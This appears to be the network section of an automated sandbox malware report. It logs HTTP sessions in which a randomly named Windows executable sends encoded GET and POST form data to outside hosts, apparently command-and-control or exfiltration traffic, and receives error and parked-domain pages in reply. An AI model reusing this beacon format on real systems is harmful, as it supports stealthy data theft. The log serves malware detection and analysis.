3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.22	49173	172.96.191.39	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:09.630803108 CEST	559	OUT	GET /3qit/?A8_pSPdX=t3sSYQcRGIG2xp6hTlX87NwaqJOkFz6rmgygjruUB9PzjWbyP4PTzskmOZowVRHJXi+H1dh53U0M9lWnnn5LaTEC7rIePtKzFAK2BftKdFSVrAHy6kwIpJ59Ijhf&38R0=jHY4nFvHAVc8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.bola88site.one Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 5, 2024 09:06:11.202347994 CEST	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Thu, 05 Sep 2024 07:06:10 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Sep 5, 2024 09:06:11.203135967 CEST	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Thu, 05 Sep 2024 07:06:10 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Sep 5, 2024 09:06:11.203475952 CEST	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Thu, 05 Sep 2024 07:06:10 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.22	49174	217.70.184.50	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:16.341559887 CEST	2472	OUT	POST /nxfn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.languagemodel.pro Origin: http://www.languagemodel.pro Content-Type: application/x-www-form-urlencoded Content-Length: 2165 Connection: close Cache-Control: max-age=0 Referer: http://www.languagemodel.pro/nxfn/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 44 6b 34 6e 31 56 68 31 55 32 33 43 53 61 62 32 6c 59 38 4f 45 50 75 78 49 44 75 67 2f 2b 2b 73 56 41 59 50 4d 56 55 77 79 75 47 75 33 44 42 30 46 79 6c 64 33 66 55 48 55 49 46 57 56 55 54 33 70 6f 6d 36 6f 4c 65 4b 41 31 61 53 59 55 78 56 70 4b 48 4d 47 35 78 48 58 61 68 72 78 69 61 4e 44 32 4e 6f 55 49 79 78 39 47 2b 43 35 72 46 30 73 5a 58 79 6e 32 41 52 37 31 2b 65 4b 73 52 47 63 2b 50 50 63 66 75 4e 43 41 2f 76 58 32 42 58 6d 31 51 59 56 46 4e 62 6c 71 45 6a 69 35 49 6a 77 4a 42 2b 57 38 42 62 74 68 36 43 35 31 6e 50 4a 6b 79 52 6a 2f 67 49 50 2b 74 2b 66 4e 66 70 6b 53 71 64 63 41 6d 6e 72 6b 56 61 6a 38 73 43 6e 33 59 43 55 59 72 37 56 30 74 67 6c 62 41 55 79 4b 45 6f 66 36 4a 54 71 78 64 74 47 74 4c 6d 59 30 4e 48 53 46 6b 56 39 59 57 6c 50 6f 6d 4a 31 48 70 68 2b 59 44 43 43 61 4f 37 56 78 2f 38 5a 76 4b 6b 51 6d 54 72 71 71 4a 66 54 68 38 4c 39 2f 4e 6a 72 5a 4e 63 66 48 5a 46 33 57 36 4a 78 35 7a 4f 51 37 76 34 77 73 6b 73 4b [TRUNCATED] Data Ascii: A8_pSPdX=3hfisZtcaPw+Dk4n1Vh1U23CSab2lY8OEPuxIDug/++sVAYPMVUwyuGu3DB0Fyld3fUHUIFWVUT3pom6oLeKA1aSYUxVpKHMG5xHXahrxiaND2NoUIyx9G+C5rF0sZXyn2AR71+eKsRGc+PPcfuNCA/vX2BXm1QYVFNblqEji5IjwJB+W8Bbth6C51nPJkyRj/gIP+t+fNfpkSqdcAmnrkVaj8sCn3YCUYr7V0tglbAUyKEof6JTqxdtGtLmY0NHSFkV9YWlPomJ1Hph+YDCCaO7Vx/8ZvKkQmTrqqJfTh8L9/NjrZNcfHZF3W6Jx5zOQ7v4wsksK+MSqxZ/hjg8pqTiD8JxzwJp2r8sk98SeasunZPX493ceomYZu/EYZ7kJZt6po483eVnuxZ2VFoNkhpda0cZSlxA2Bat7oK4OcSKCumipFYQz2X8/GN4VOVcr/5tvtTdxkYNJEZJSBuZ5XSYtyNBsCK1oaMnyvGwY7W9JCLkJv1v2hsWvb5PpuImTngJxBmRde38xwT5w9kjJFjsZZOY54dY5X/kGf+Fk0G24JK7+ADNrVntdG6bMxKJqUoS0De9myNdZjvz+hqmrzwzsjFn1z+jOW9JSj0ORQUoUSMErDA/UEOxZxVFJFL3YQBAlZkAgkA5MDcumGHY79LGfiToSWW9zadDigYZruBuV43JLka1PkEDYAzKfbSYPNXvGT3OCI5Liod2TIhn7H3l+iB1GLdKlSiuk5SNHCJ6oVRtYGAjR3KK7DI3Yh3GqJCbCUVOYZpMEp5d95QyZQaQI6NWikkRnQKE4h2Nzg43DNi8xbN4njFNcSnmn8/Kvmwq+MMFKJuOyOmmgNHQjKGjlfwJw+rj3b4EsHx5VZt67bYFCXmpFGPoGl80EjEP/uoZ5wZCvRn7Vfy8rO71oXo23KQ6Ny/ktThnmWBofC+WZqOjqe3YW5ZT/x985+XFYR5NVO5pG9w3mUsGg/UYBPxKcBJV3ZRPL57HmKj6DCt [TRUNCATED]
Sep 5, 2024 09:06:16.346525908 CEST	316	OUT	Data Raw: 66 65 62 4d 79 44 50 32 37 4e 62 7a 42 52 44 37 33 4f 2f 66 61 39 79 66 37 36 6f 32 75 66 56 51 46 49 2f 70 59 30 4b 44 52 55 55 56 48 6a 69 70 75 30 38 33 52 30 54 33 45 69 6d 39 4b 59 47 46 6b 31 75 7a 51 56 5a 63 79 45 2f 4d 62 6d 32 44 6b 44 Data Ascii: febMyDP27NbzBRD73O/fa9yf76o2ufVQFI/pY0KDRUUVHjipu083R0T3Eim9KYGFk1uzQVZcyE/Mbm2DkDF7h9KNt3peqRQU2bY8Y3HDUNrobFnhsu6SU0XiCQflJeIUsBAzmc8wFJQJWzl14bONCEy0aQvC7+ggbNb/cdxIlnfa1ij6nxJJ/IMyk/UmusiNbRfwu6ZJeacXkObtK2w0axQC6orqz9+m6pJG8s5oEwsKGzwllPZ
Sep 5, 2024 09:06:16.931413889 CEST	608	IN	HTTP/1.1 501 Unsupported method ('POST') Server: nginx Date: Thu, 05 Sep 2024 07:06:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED] Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.22	49175	217.70.184.50	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:18.885534048 CEST	2472	OUT	POST /nxfn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.languagemodel.pro Origin: http://www.languagemodel.pro Content-Type: application/x-www-form-urlencoded Content-Length: 3629 Connection: close Cache-Control: max-age=0 Referer: http://www.languagemodel.pro/nxfn/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Data Raw: 41 38 5f 70 53 50 64 58 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 43 73 56 43 51 50 4c 46 55 77 7a 75 47 68 30 44 42 30 46 79 6c 65 33 66 51 58 55 49 4a 6f 56 58 37 33 70 71 65 36 6f 49 32 4b 52 31 61 53 58 30 78 58 70 4b 44 75 47 35 73 51 58 5a 31 4e 78 6a 4f 4e 4d 69 6c 6f 54 64 47 79 33 57 2b 49 77 4c 46 56 73 5a 54 50 6e 32 49 42 37 33 7a 54 4b 75 56 47 62 4f 50 50 64 76 75 4b 4b 67 2b 72 42 47 42 5a 6d 31 73 6c 56 46 4e 58 6c 71 51 61 69 34 30 6a 2f 37 4a 2b 57 2f 70 59 69 52 36 46 32 56 6e 50 57 55 79 66 6a 2f 68 4c 50 2b 74 2b 66 4d 6a 70 32 53 71 64 63 42 6d 6b 6b 45 56 61 71 63 73 4c 70 58 45 34 55 59 2b 59 56 31 63 56 6c 73 51 55 39 6f 63 6f 53 71 4a 54 69 68 63 6f 47 74 4c 68 53 55 4d 57 53 42 49 64 39 59 6e 67 50 6f 6d 4a 31 45 78 68 37 4e 66 43 4c 71 4f 37 58 78 2f 39 41 2f 4b 37 51 6d 6e 46 71 71 56 66 54 6a 41 4c 39 49 68 6a 74 62 55 4b 51 58 5a 45 67 47 36 50 31 35 7a 62 51 37 79 58 77 73 38 57 4b [TRUNCATED] Data Ascii: A8_pSPdX=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//CsVCQPLFUwzuGh0DB0Fyle3fQXUIJoVX73pqe6oI2KR1aSX0xXpKDuG5sQXZ1NxjONMiloTdGy3W+IwLFVsZTPn2IB73zTKuVGbOPPdvuKKg+rBGBZm1slVFNXlqQai40j/7J+W/pYiR6F2VnPWUyfj/hLP+t+fMjp2SqdcBmkkEVaqcsLpXE4UY+YV1cVlsQU9ocoSqJTihcoGtLhSUMWSBId9YngPomJ1Exh7NfCLqO7Xx/9A/K7QmnFqqVfTjAL9IhjtbUKQXZEgG6P15zbQ7yXws8WK+8SqzB/sig8paTtOcJ13wE92rl9k9oCeccu19jXuOPfDImWeu/OcZ7SJZ4wpqg8wqJnvyR2R2QOiRo0e0dPAlxU2B/u7tuoOtiKDemiqnAfuWXzl2NqAeUbr/5HvofrxR8NJEpJTT2Z5XSbqyNcji3WodEjyuqgY4e9JSbkJrhvsxsWm75MnOIWTkcZxAeBetL8xW/5juMjLljubZOj0Yd/5TbkGeKVkwC24oK79hDNyFnpC26EMxL2qVcO0DuLm3VdZg3zpwqmmTwy8TFrkj+IOW0WSn0kRRMoVzsEnWs/XkOzSRVFT1LvYUt6ld02gmg5NwUuhmHb2dLJTCTrZ2WvzaNDigEZrv1uSLfJPXy1SkEBcAzQKLOoPNHJGWHkCL9Li4x2atVg0X3jrSBvCLcllSiqk82dHzp6oHJtenAgZ3KNuzIkWB3qqJS1CRVeZuxMEqxd9r4yYgaQI6NJikkKnQP34hGjzg43CYW82tR4oDFMUyn9j8/Evmkc+IojKNWOzeGmgNHT9qGg9PwKw+mL3b4qsHN5Vrh66NsFGFOpT2PoBl87dzEO/upH51wavUT7XvS8/tD0hHo1/qQsESjvtTc6mXloKgqWabOjpu3Yb5ZUwR9l9+SaYRMoVPIxFPY3mnUGzoIXKfxxDRJT3cJsL/jPmKKNDD1 [TRUNCATED]
Sep 5, 2024 09:06:18.890592098 CEST	1780	OUT	Data Raw: 54 74 7a 50 6b 44 50 79 38 4e 62 6b 66 68 43 5a 33 4f 2b 45 61 2f 4b 50 37 37 6b 32 75 62 4a 51 45 72 48 70 5a 55 4b 41 59 30 55 32 48 6a 6a 30 75 33 4d 2f 52 78 61 38 45 6b 69 39 46 65 36 46 6e 43 61 7a 58 56 5a 61 79 45 2f 4b 47 57 36 36 6b 44 Data Ascii: TtzPkDPy8NbkfhCZ3O+Ea/KP77k2ubJQErHpZUKAY0U2Hjj0u3M/Rxa8Eki9Fe6FnCazXVZayE/KGW66kDFNh9ONtzFeqSYU3rY/e3HCetrvO1ntsu6oU0LECWflJMAUv1Uzms82Q5QkSz5e4bDfCFjWbgPC9Lkge/j/b9xL73eY1ivSnyx//JcIkKkmt8iNfUrxkqZTIqcQkObJK2owa1Ao6snqz/Wm4ZJB185uBwtdGzsAlPB
Sep 5, 2024 09:06:19.491352081 CEST	608	IN	HTTP/1.1 501 Unsupported method ('POST') Server: nginx Date: Thu, 05 Sep 2024 07:06:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED] Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.22	49176	217.70.184.50	80	1036	C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Timestamp	Bytes transferred	Direction	Data
Sep 5, 2024 09:06:21.429543972 CEST	562	OUT	GET /nxfn/?38R0=jHY4nFvHAVc8&A8_pSPdX=6j3CvtUhPdUgNSN69j0+QWfnbreQhpE9GdmFQzyR6PqyVz5YOV5rsMCr01dDJ3tx7/JxUqdZcV7VgtOZ6IqGV2qYbE9Zg8C0OLxYd5Fblj7aWglYFvr22nOv484K HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.languagemodel.pro Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Sep 5, 2024 09:06:22.024652004 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Sep 2024 07:06:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 [TRUNCATED] Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>languagemodel.pro</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
